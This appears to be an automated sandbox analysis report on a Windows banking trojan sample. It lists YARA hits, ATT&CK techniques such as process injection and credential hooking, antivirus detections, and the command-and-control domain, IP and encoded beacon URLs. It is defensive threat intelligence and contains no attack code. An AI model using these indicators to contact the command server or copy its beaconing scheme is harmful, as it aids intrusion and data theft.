Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection812	Obfuscated Files or Information2	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer4	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Software Packing22	Credential API Hooking3	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Logon Script (Windows)	File Deletion1	Input Capture1	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection11	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	System Information Discovery26	Distributed Component Object Model	Credential API Hooking3	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery1	SSH	Input Capture1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery11	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery3	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FpYf5EGDO9.exe	46%	Virustotal		Browse
FpYf5EGDO9.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.FpYf5EGDO9.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.FpYf5EGDO9.exe.2140e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.FpYf5EGDO9.exe.2150000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.FpYf5EGDO9.exe.3c40000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Link
ds-ats.member.g02.yahoodns.net	0%	Virustotal	Browse
edge.gycpi.b.yahoodns.net	0%	Virustotal	Browse
soderunovos.website	0%	Virustotal	Browse
222.222.67.208.in-addr.arpa	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://ns.adobp/3	0%	Avira URL Cloud	safe
http://ns.adobe.co/xa	0%	Avira URL Cloud	safe
https://soderunovos.websitehttps://qoderunovos.websiteo	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://ns.adobp/	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://ns.adobe.cmg	0%	Avira URL Cloud	safe
https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw	0%	Avira URL Cloud	safe
https://qoderunovos.website	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
new-fp-shed.wg1.b.yahoo.com	87.248.100.216	true	false		high
myip.opendns.com	84.17.52.63	true	false		high
lycos.com	209.202.254.90	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
ds-ats.member.g02.yahoodns.net	212.82.100.140	true	false	0%, Virustotal, Browse	unknown
yahoo.com	74.6.143.26	true	false		high
edge.gycpi.b.yahoodns.net	87.248.118.22	true	false	0%, Virustotal, Browse	unknown
soderunovos.website	89.44.9.140	true	true	0%, Virustotal, Browse	unknown
www.lycos.com	209.202.254.90	true	false		high
www.yahoo.com	unknown	unknown	false		high
mail.yahoo.com	unknown	unknown	false		high
222.222.67.208.in-addr.arpa	unknown	unknown	true	2%, Virustotal, Browse	unknown
login.yahoo.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/	false		high
https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw	false	Avira URL Cloud: safe	unknown
https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw	false		unknown
https://lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg	false		high
https://mail.yahoo.com/images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif	false		high
https://login.yahoo.com/?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif	false		high
https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg	false		high
https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ns.adobp/3	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false		high
http://ns.adobe.co/xa	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soderunovos.websitehttps://qoderunovos.websiteo	FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yahoo.com//	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz	FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
http://ns.adobp/	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://constitution.org/usdeclar.txtC:	FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	low
https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high
http://ns.adobe.cmg	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://qoderunovos.website	FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://www.yahoo.com/u	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://yahoo.com/	FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	false		high
http://ns.micro/1S	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	false		unknown
https://soderunovos.website/	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		unknown
http://constitution.org/usdeclar.txt	FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.uxs	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	false		unknown
https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL	FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false		high
https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/	FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	false		unknown
http://ns.adobe.ux	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false		unknown
https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high
https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		unknown
https://soderunovos.website	FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	true		unknown
https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		unknown
http://ns.micro/1	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmp	false		high
https://policies.yahoo.com/w3c/p3p.xml	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/R	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
89.44.9.140	soderunovos.website	Romania	9009	M247GB	true
74.6.143.26	yahoo.com	United States	26101	YAHOO-3US	false
209.202.254.90	lycos.com	United States	6354	LYCOSUS	false
87.248.118.22	edge.gycpi.b.yahoodns.net	United Kingdom	203220	YAHOO-DEBDE	false
87.248.100.216	new-fp-shed.wg1.b.yahoo.com	United Kingdom	34010	YAHOO-IRDGB	false
212.82.100.140	ds-ats.member.g02.yahoodns.net	United Kingdom	34010	YAHOO-IRDGB	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	527488
Start date:	23.11.2021
Start time:	20:57:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FpYf5EGDO9.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	6
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winEXE@33/20@11/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.9% (good quality ratio 14.4%) Quality average: 83.4% Quality standard deviation: 25.6%
HCA Information:	Successful, ratio: 78% Number of executed functions: 140 Number of non-executed functions: 150
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:59:38	API Interceptor	27x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
89.44.9.140	anIV2qJeLD.exe	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
74.6.143.26	Fuutbqvhmc.dll	Get hash	malicious	Browse
	X4V4jFmFhO.dll	Get hash	malicious	Browse
	bebys10.dll	Get hash	malicious	Browse
	WGEcMZQA.dll	Get hash	malicious	Browse
	vdbb9MZTVz.dll	Get hash	malicious	Browse
	Information.xlsb	Get hash	malicious	Browse
	V3HZtftyV5.xlsb	Get hash	malicious	Browse
	t6i4DJb8qh.xlsb	Get hash	malicious	Browse
	9Ild0p2cVg.xlsb	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.26846.xlsb	Get hash	malicious	Browse
	Attachment_97680.xlsb	Get hash	malicious	Browse
	Attachment_96948.xlsb	Get hash	malicious	Browse
	Document_89069.xlsb	Get hash	malicious	Browse
	Attachment_777329.xlsb	Get hash	malicious	Browse
	co-Payment.xlsb	Get hash	malicious	Browse
	Presentation_812525.xlsb	Get hash	malicious	Browse
	Document_7647.xlsb	Get hash	malicious	Browse
	Document_7647.xlsb	Get hash	malicious	Browse
	Invoice_52133.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
